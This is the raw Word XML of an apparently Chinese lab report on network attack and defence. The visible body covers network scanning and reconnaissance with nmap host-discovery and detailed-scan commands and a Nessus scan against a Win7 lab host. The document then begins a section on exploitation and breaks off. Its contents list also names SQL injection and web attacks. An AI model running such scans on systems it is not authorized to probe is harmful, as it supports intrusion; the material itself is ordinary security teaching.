            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4.4 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8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BABC8" w14:textId="1DE8614A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69" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4.5 防守措施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69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A07E6" w14:textId="3F73F38B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0" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4.6 再次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0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6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E04A" w14:textId="6A9437E5" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765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1" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5 SQL注入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1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259A4" w14:textId="062D02A4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2" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5.1 原理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2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5AB7D" w14:textId="6EF3B3F5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3" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5.2 双方软件环境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3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0BC1D" w14:textId="54B0ED3B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4" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5.3 操作步骤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4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D9F58" w14:textId="379622B2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5" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5.4 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5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C1B8" w14:textId="3BDB0423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6" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5.5 防守措施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6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28604" w14:textId="74E45806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7" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5.6 再次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7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BF696" w14:textId="3E54C9F3" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765F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8" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6 Web网站攻击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8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F95A3" w14:textId="086BBCD9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79" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6.1 原理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79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C4A16" w14:textId="0057A98B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80" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6.2 双方</w:t>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>软</w:t>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>件环境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80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2E67F" w14:textId="366757C4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81" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6.3 操作步骤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81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1389B" w14:textId="16569B9C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82" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6.4 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82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55B10" w14:textId="0E8F2F87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83" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6.5 防守措施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83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36877" w14:textId="15335193" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765F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76889984" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6.6 再次验证</w:t>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/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begin"/>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76889984 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr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06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F3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8B968" w14:textId="73DB71D2" w:rsidR="00DB5503" w:rsidRDefault="00DB5503">
          <w:r w:rsidRPr="00C54B87">
            <w:rPr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7DF7B30C" w14:textId="6EB74D33" w:rsidR="00A45519" w:rsidRPr="00A72932" w:rsidRDefault="00A45519" w:rsidP="00A45519">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc76889943"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>网络扫描侦察</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="5AEE34CD" w14:textId="13509CBC" w:rsidR="005E252A" w:rsidRPr="00A72932" w:rsidRDefault="00971052" w:rsidP="00A72932">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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25" w:name="_Toc76889944"/>
      <w:r w:rsidR="005E252A" w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="6E567560" w14:textId="7B0E9C80" w:rsidR="00A72932" w:rsidRPr="00A72932" w:rsidRDefault="00A72932" w:rsidP="00A72932">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>通过对目标网络进行探测扫描，获得有关目标计算机网络系统的拓扑结构、通信体制、加密方式、网络协议、操作系统、开放的服务，以及目标地理位置等各方面的有用信息，并进一步判别其主控节点和脆弱节点，为实施网络攻击提供可靠的情报保障。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B035D" w14:textId="3491A99C" w:rsidR="005E252A" w:rsidRDefault="00971052" w:rsidP="00A72932">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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26" w:name="_Toc76889945"/>
      <w:r w:rsidR="005E252A" w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>双方软件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="66814E97" w14:textId="1C2C173E" w:rsidR="00A72932" w:rsidRPr="00C54B87" w:rsidRDefault="00A72932" w:rsidP="00A72932">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻方系统和软件环境：</w:t>
      </w:r>
      <w:r w:rsidR="004434D0"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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali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+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Nmap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+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Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEF710F" w14:textId="59B1FC62" w:rsidR="00A72932" w:rsidRDefault="00A72932" w:rsidP="00A72932">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>防方系统环境：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54B87"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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004434D0"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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Win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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2EBCFA" w14:textId="7AA677CE" w:rsidR="004434D0" w:rsidRDefault="00816B69" w:rsidP="00A7293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环节及以下环节均需要Wi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7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和 kali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主机能够连通</w:t>
      </w:r>
      <w:r w:rsidR="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59929EC5" w14:textId="62845E9E" w:rsidR="00816B69" w:rsidRPr="00816B69" w:rsidRDefault="00816B69" w:rsidP="00A7293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即互相可以Ping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通。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E3C06" w14:textId="5F357A05" w:rsidR="00A72932" w:rsidRDefault="00971052" w:rsidP="00A72932">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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27" w:name="_Toc76889946"/>
      <w:r w:rsidR="005E252A" w:rsidRPr="00C54B87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>操作步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="21970E0D" w14:textId="5B4F8930" w:rsidR="00816B69" w:rsidRPr="000E0E28" w:rsidRDefault="00816B69" w:rsidP="00816B69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nmap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-sP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+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 xml:space="preserve">目的主机IP地址 </w:t>
      </w:r>
      <w:r w:rsidR="00E06F34" w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E06F34" w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E06F34" w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00E06F34"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进行</w:t>
      </w:r>
      <w:r w:rsidR="00E06F34" w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>主机开启与否扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49107656" w14:textId="6416594C" w:rsidR="00E06F34" w:rsidRPr="000E0E28" w:rsidRDefault="00E06F34" w:rsidP="00816B69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nmap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-A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-v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+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 xml:space="preserve">主机IP地址 </w:t>
      </w:r>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>//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进行主机详细扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9AD851" w14:textId="5C56E3F3" w:rsidR="000E0E28" w:rsidRDefault="00E06F34" w:rsidP="00816B69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="145DF095" wp14:editId="600CBCC3">
            <wp:extent cx="5272727" cy="1915886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044" cy="19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543DF" w14:textId="25AB0991" w:rsidR="00E06F34" w:rsidRPr="000E0E28" w:rsidRDefault="00E06F34" w:rsidP="00816B69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nessus</w:t>
      </w:r>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E0E28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>配置好要扫描的主机IP地址和扫描方式进行扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D20B51" w14:textId="0DC7AFD7" w:rsidR="00C54B87" w:rsidRDefault="00C54B87" w:rsidP="00C54B87"/>
    <w:p w14:paraId="40B18DB8" w14:textId="45A38D30" w:rsidR="000E0E28" w:rsidRPr="00C54B87" w:rsidRDefault="000E0E28" w:rsidP="00C54B87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3769C0" wp14:editId="51DFB1D8">
            <wp:extent cx="5274310" cy="3086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C97B" w14:textId="1F29C493" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="004434D0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc76889947"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="7733F422" w14:textId="0A93BE07" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>在连通的情况下，在获取到目标主机的IP地址时，可以进行简便的扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。验证没有问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA5E363" w14:textId="44F04681" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="004434D0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc76889948"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>防守措施</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="71BD8FBF" w14:textId="77777777" w:rsidR="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525FEC12" w14:textId="77777777" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="557" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B378D22" w14:textId="4C60F150" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="004434D0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc76889949"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>再次验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="4633CD8A" w14:textId="77777777" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="557" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF31228" w14:textId="4815BCE7" w:rsidR="00A45519" w:rsidRPr="00E06F34" w:rsidRDefault="00A45519" w:rsidP="00E06F34">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc76889950"/>
      <w:r w:rsidRPr="00E06F34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E06F34">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E06F34">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="3D73BC9C" w14:textId="60EDBE4D" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc76889951"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>2.1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原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="1BAA6CD0" w14:textId="6D51A69E" w:rsidR="004434D0" w:rsidRPr="004434D0" w:rsidRDefault="004434D0" w:rsidP="004434D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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漏洞利用（英语：Exploit，本意为“利用”）是</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="计算机安全" w:history="1">
        <w:r w:rsidRPr="004434D0">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>计算机安全</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>术语，指的是利用程序中的某些</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="漏洞" w:history="1">
        <w:r w:rsidRPr="004434D0">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>漏洞</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，来得到计算机的控制权（使自己编写的代码越过具有漏洞的程序的限制，从而获得</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tooltip="运行（页面不存在）" w:history="1">
        <w:r w:rsidRPr="004434D0">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>运行</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>权限）。在英语中，本词也是名词，表示为了利用漏洞而编写的攻击程序，即漏洞利用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1787DD" w14:textId="2C719503" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc76889952"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>2.2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双方软件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="40F327E2" w14:textId="77777777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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻方系统和软件环境：</w:t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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004434D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
